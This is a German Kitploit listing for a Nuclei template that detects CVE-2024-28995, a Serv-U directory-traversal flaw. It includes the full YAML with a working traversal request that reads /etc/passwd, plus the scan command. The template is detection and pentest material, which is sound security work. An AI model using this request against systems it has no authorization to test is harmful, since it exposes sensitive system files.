Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-28995-Nuclei-Template — Nuclei-Vorlage zur Erkennung von CVE-2024-28995, einer Directory-Traversal-Schwachstelle im Serv-U FTP-Server, die das Lesen von Dateien durch manipulierte HTTP-Anfragen ermöglicht. | Kitploit
Tools/GitHubGitHub/huseyinstif/cve-2024-28995-nuclei-template
SchwachstellenscannerWeb-SchwachstellenscannerSchwachstellenanalyseExploitationWebsicherheitPenetrationstests
GitHubhuseyinstif/cve-2024-28995-nuclei-template

CVE-2024-28995-Nuclei-Template

Nuclei-Vorlage zur Erkennung von CVE-2024-28995, einer Directory-Traversal-Schwachstelle im Serv-U FTP-Server, die das Lesen von Dateien durch manipulierte HTTP-Anfragen ermöglicht.

Repository anzeigen
14vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-28995 Nuclei-Vorlage

Prüft auf Directory-Traversal-Sicherheitslücke in Serv-U Versionen 15.4.2 und darunter, die das Lesen sensibler Dateien wie /etc/passwd ermöglicht.

Vorlagendetails

root@kitploit:~
id: CVE-2024-28995

info:
  name: Serv-U Directory Traversal Vulnerability
  author: Hüseyin TINTAŞ
  severity: high
  description: Checks for directory traversal vulnerability in Serv-U versions 15.4.2 and below, which allows reading sensitive files like /etc/passwd.
  reference:
    - https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
  tags: pathtraversal,cve,high,serv-u

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?InternalDir=\\..\\..\\..\\..\\etc^&InternalFile=passwd"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "root:x:"
          - "daemon:x:"
          - "bin:x:"
        part: body

      - type: status
        status:
          - 200

      - type: word
        words:
          - "Server: Serv-U"
        part: header



Verwendung

Um diese Vorlage mit Nuclei zu verwenden, speichern Sie den Vorlageninhalt in einer Datei namens CVE-2024-28995.yaml und führen Sie den folgenden Befehl aus:

root@kitploit:~
nuclei -t CVE-2024-28995.yaml -u <target-url>

Ersetzen Sie <target-url> durch die URL des Ziels, das Sie scannen möchten.

Kontakt

Bei Fragen oder für weitere Informationen können Sie mich kontaktieren über:

  • LinkedIn
  • Twitter
Tool herunterladen